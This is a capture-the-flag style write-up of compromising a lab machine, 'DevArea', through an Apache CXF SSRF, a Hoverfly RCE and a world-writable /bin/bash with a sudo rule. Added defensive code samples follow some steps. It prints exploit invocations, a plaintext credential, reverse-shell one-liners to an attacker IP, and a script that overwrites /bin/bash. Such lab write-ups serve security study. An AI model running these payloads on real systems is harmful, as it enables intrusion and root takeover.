DevArea is a Linux machine hosting multiple vulnerable services. Initial access is gained through anonymous FTP revealing a JAR file vulnerable to Apache CXF SSRF (CVE-2022-46364), which exposes Hoverfly credentials in systemd service files. The Hoverfly instance is vulnerable to path traversal (CVE-2025-54123), leading to remote code execution. Privilege escalation exploits a world-writable `/bin/bash` binary combined with a passwordless sudo rule, allowing arbitrary command execution as root.
nmap -sVC 10.129.11.211 -p- --min-rate 1000 -Pn
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-29 01:38 +0300
Warning: 10.129.11.211 giving up on port because retransmission cap hit (10).
Nmap scan report for devarea.htb (10.129.11.211)
Host is up (0.16s latency).
Not shown: 61712 closed tcp ports (reset), 3817 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Sep 22 2025 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.144
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:13:6b:a1:9b:28:fd:bd:5d:2b:ee:03:be:9c:8d:82 (ECDSA)
|_ 256 0a:86:fa:65:d1:20:b4:3a:57:13:d1:1a:c2:de:52:78 (ED25519)
80/tcp open http Apache httpd 2.4.58
|_http-title: DevArea - Connect with Top Development Talent
8080/tcp open http Jetty 9.4.27.v20200227
|_http-title: Error 404 Not Found
8500/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 500 Internal Server Error
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Sat, 28 Mar 2026 22:40:50 GMT
| Content-Length: 64
| This is a proxy server. Does not respond to non-proxy requests.
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 500 Internal Server Error
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Sat, 28 Mar 2026 22:40:28 GMT
| Content-Length: 64
|_ This is a proxy server. Does not respond to non-proxy requests.
8888/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)


ftp -a 10.129.11.211

We can install syft and grype to inventory the JAR's bundled dependencies and scan them for known vulnerabilities:
curl -sSfL https://get.anchore.io/syft | sudo sh -s -- -b /usr/local/bin
curl -sSfL https://get.anchore.io/grype | sudo sh -s -- -b /usr/local/bin
# Step 1: Generate SBOM
syft target.jar -o json > sbom.json

# Step 2: Scan for vulns
grype sbom:sbom.json

Checking the critical findings, we find the Apache CXF Server-Side Request Forgery vulnerability (GHSA-x3x3-qwjq-8gj4):
Severity: High (CVSS 9.8)
Component: Apache CXF
Versions Affected: < 3.4.10, < 3.5.5
Attack Vector: Network / No Auth Required
Description:
An SSRF vulnerability in Apache CXF's FileDataSource and URLDataSource allows an attacker to perform unauthorized file and URL access on the server. An attacker can exploit Attachment objects in requests to access arbitrary files or URLs on the system.
Impact:
Remediation:
References:
python3 CVE-2022-46364.py --target https://devarea.htb:8080/employeeservice --ssrf-url 'file:///etc/passwd' --domain devarea.htb
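As an added, defender-side example (not part of the original writeup, and not Apache CXF's own code): the kind of scheme and host allowlist that an attachment fetcher needs so that a caller-supplied href cannot reach file:// or internal services. The allowed host name and the helper names are assumptions for illustration.

```python
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed allowlist of hosts an attachment fetcher may contact (hypothetical name).
ALLOWED_HOSTS = {"files.devarea.htb"}
ALLOWED_SCHEMES = {"http", "https"}


def is_safe_attachment_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `url` is an http(s) URL to an allowlisted external host.

    This is the check that is missing when a data source accepts arbitrary hrefs:
    file:// reads local files and unrestricted http(s) reaches internal services.
    """
    try:
        parsed = urlparse(url)
    except ValueError:          # e.g. malformed IPv6 brackets
        return False
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        return False            # blocks file:, ftp:, jar:, gopher:, ...
    host = parsed.hostname      # already lower-cased by urlparse
    if not host:
        return False            # "file:///etc/passwd" or "http:///x" has no host
    if parsed.username or parsed.password:
        return False            # rejects userinfo tricks like http://good@evil/
    # IP literals are refused when they point at loopback/private/link-local space,
    # even if someone later adds such an address to the allowlist.
    try:
        addr = ip_address(host)
    except ValueError:
        addr = None             # a DNS name, handled by the allowlist below
    if addr is not None and (addr.is_loopback or addr.is_private
                             or addr.is_link_local or addr.is_reserved
                             or addr.is_multicast):
        return False
    return host in allowed_hosts


if __name__ == "__main__":
    for u in ("https://files.devarea.htb/report.pdf", "file:///etc/passwd",
              "http://127.0.0.1:8888/api/v2/hoverfly"):
        print(u, "->", is_safe_attachment_url(u))
```

The allowlist is checked on the host name only; it does not resolve names, so a name that resolves to an internal address (DNS rebinding) still has to be handled at connect time by checking the resolved socket address before the request is sent.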

Check for stored credentials in systemd unit files:
python3 CVE-2022-46364.py --target https://devarea.htb:8080/employeeservice --ssrf-url 'file:///etc/systemd/system/' --domain devarea.htb

We see hoverfly.service; reading it gives us hardcoded credentials:
python3 CVE-2022-46364.py --target https://devarea.htb:8080/employeeservice --ssrf-url 'file:///etc/systemd/system/hoverfly.service' --domain devarea.htb

Now we can log in to Hoverfly with these credentials.

Checking the version, we find it vulnerable to CVE-2025-54123:
Severity: High (CVSS 7.5)
Component: Hoverfly
Versions Affected: < 1.10.4
Attack Vector: Network / No Auth Required
Description:
A path traversal vulnerability in Hoverfly’s file handling allows an attacker to read arbitrary files from the server’s filesystem. The vulnerability exists in the simulation import functionality where user-controlled file paths are not properly validated, enabling directory traversal attacks using sequences like ../.
Impact:
Remediation:
References:
Using the PoC with the credentials we have, we get a shell:
python3 CVE-2025-54123.py -t https://devarea.htb:8888 -u admin -p 'O7IJ27MyyXiU' -c '/usr/bin/bash -i >& /dev/tcp/10.10.16.144/9001 0>&1'
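As an added example (not the original writeup's code and not Hoverfly's own code): the validation an import feature needs so that a caller-supplied file path cannot escape the simulation directory. It resolves the joined path (collapsing ../ and symlinks) and then checks containment against the resolved base instead of doing a string-prefix comparison. The base directory and function names are assumptions.

```python
import os
from pathlib import Path


class PathTraversalError(ValueError):
    """Raised when a caller-supplied path would escape the import directory."""


def resolve_under(base_dir: str, requested: str) -> str:
    """Resolve `requested` (user-controlled) strictly inside `base_dir`.

    Defends the pattern described above: a file-import feature that joins a
    caller-supplied path onto a directory without validating the result.
    """
    if not requested:
        raise PathTraversalError("empty path")
    if "\x00" in requested:
        raise PathTraversalError("NUL byte in path")   # truncates paths in C file APIs
    if os.path.isabs(requested):
        raise PathTraversalError(f"absolute path rejected: {requested!r}")
    base = Path(base_dir).resolve()
    # resolve() collapses ../ segments and follows symlinks, so the check below sees
    # where the file really is, not how the path was spelled.
    candidate = (base / requested).resolve()
    # Containment test on path components: "/srv/sims-old" is NOT under "/srv/sims",
    # which a naive str.startswith() prefix check would get wrong.
    if candidate != base and base not in candidate.parents:
        raise PathTraversalError(f"path escapes {base}: {requested!r}")
    return str(candidate)


def is_safe_import_path(base_dir: str, requested: str) -> bool:
    """Boolean wrapper for callers that just need accept/reject."""
    try:
        resolve_under(base_dir, requested)
        return True
    except PathTraversalError:
        return False


if __name__ == "__main__":
    # Constructed base directory for illustration; it does not need to exist.
    base = "/srv/hoverfly/simulations"
    for p in ("sub/../sim.json", "../../../etc/passwd", "/etc/passwd", "../simulations-old/x"):
        print(repr(p), "->", is_safe_import_path(base, p))
```

Because the check runs on the fully resolved path, a symlink inside the base that points outside it is rejected as well; if a deployment legitimately needs such links, the containment check has to be applied to each symlink target explicitly rather than relaxed.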



We can see that syswatch-monitor.service calls an executable that is writable by everyone.


We can overwrite /bin/bash so that when syswatch.sh runs as root through sudo, its shebang executes our payload, giving us a root shell:
exec sh
killall -9 /bin/bash
cp /bin/bash /tmp/bash
cat > /bin/bash << 'EOF'
#!/tmp/bash
bash -i >& /dev/tcp/10.10.16.144/9002 0>&1 &
EOF
sudo /opt/syswatch/syswatch.sh --version && cp /tmp/bash /bin/bash

Vulnerability: World-writable /bin/bash combined with passwordless sudo rule
Sudo Rule: (root) NOPASSWD: /opt/syswatch/syswatch.sh
Impact: Arbitrary command execution as root
Exploitation Steps:
# Setup listener on attacker
nc -lvnp 9002
# On target machine
exec sh
killall -9 /bin/bash
cp /bin/bash /tmp/bash
cat > /bin/bash << 'EOF'
#!/tmp/bash
bash -i >& /dev/tcp/10.10.16.144/9002 0>&1 &
EOF
sudo /opt/syswatch/syswatch.sh --version && cp /tmp/bash /bin/bash
Attack Flow:
exec sh - prevents killing our own session
/bin/bash - overwritten with our payload script (the real binary is kept at /tmp/bash)
#!/bin/bash → syswatch.sh's shebang executes our payload as root
Why It Works:
/bin/bash has incorrect permissions (world-writable: 666 or 777)
syswatch.sh uses #!/bin/bash shebang → invokes our malicious script
Remediation:
chmod 755 /bin/bash
(and check /bin/* for any other world-writable binaries)
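As an added, defender-side example (not part of the original writeup): an audit that finds the condition exploited above, i.e. a NOPASSWD sudo command whose script, or whose shebang interpreter, is world-writable. The sandbox builder constructs a throwaway copy of the layout (a fake "bash" left mode 777 and a script whose shebang points at it) so the audit can be run offline; the sudoers line, paths and function names are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Matches the command part of rules such as "user ALL=(root) NOPASSWD: /path/to/script"
# and of "sudo -l" output lines such as "(root) NOPASSWD: /path/to/script".
NOPASSWD_RE = re.compile(r"NOPASSWD:\s*(.+?)\s*$")


def world_writable(path: str) -> bool:
    """True if `path` exists and has the other-write bit set (a 666/777 binary)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def shebang_interpreter(script: str):
    """Return the interpreter named on the script's first line, or None."""
    try:
        with open(script, "rb") as f:
            first = f.readline()
    except OSError:
        return None
    if not first.startswith(b"#!"):
        return None
    parts = first[2:].strip().split()
    return parts[0].decode(errors="replace") if parts else None


def audit_sudo_rules(sudoers_text: str):
    """Return (command, reason) findings for NOPASSWD commands that can be hijacked
    because the command itself or its shebang interpreter is world-writable.
    Comma-separated command lists are handled; arguments after a path are ignored."""
    findings = []
    for line in sudoers_text.splitlines():
        line = line.split("#", 1)[0]          # drop sudoers comments
        m = NOPASSWD_RE.search(line)
        if not m:
            continue
        for entry in m.group(1).split(","):
            tokens = entry.strip().split()
            cmd = tokens[0] if tokens else ""
            if not cmd or cmd == "ALL":
                continue
            if world_writable(cmd):
                findings.append((cmd, "command is world-writable"))
            interp = shebang_interpreter(cmd)
            if interp and world_writable(interp):
                findings.append((cmd, f"shebang interpreter {interp} is world-writable"))
    return findings


def build_demo_sandbox() -> str:
    """Construct a throwaway layout mirroring the page's bug, using fake files only:
    a script with a shebang pointing at an 'interpreter' left mode 777.
    Returns a constructed sudoers line referencing the script."""
    root = tempfile.mkdtemp(prefix="sudo-audit-demo-")
    fake_bash = os.path.join(root, "bin", "bash")          # stands in for /bin/bash
    script = os.path.join(root, "opt", "syswatch", "syswatch.sh")
    os.makedirs(os.path.dirname(fake_bash))
    os.makedirs(os.path.dirname(script))
    with open(fake_bash, "w") as f:
        f.write("#!/bin/sh\necho placeholder interpreter\n")   # never executed here
    os.chmod(fake_bash, 0o777)                               # the misconfiguration
    with open(script, "w") as f:
        f.write(f"#!{fake_bash}\necho syswatch\n")
    os.chmod(script, 0o755)                                  # the script itself is fine
    return f"monitor ALL=(root) NOPASSWD: {script}\n"


if __name__ == "__main__":
    for cmd, reason in audit_sudo_rules(build_demo_sandbox()):
        print(f"{cmd}: {reason}")
```

On a real host the same function is fed the contents of /etc/sudoers and /etc/sudoers.d/* (readable only as root) or the output of sudo -l; a world-writable interpreter is worth alerting on regardless of sudo rules, since any script using that shebang, including systemd units, is affected.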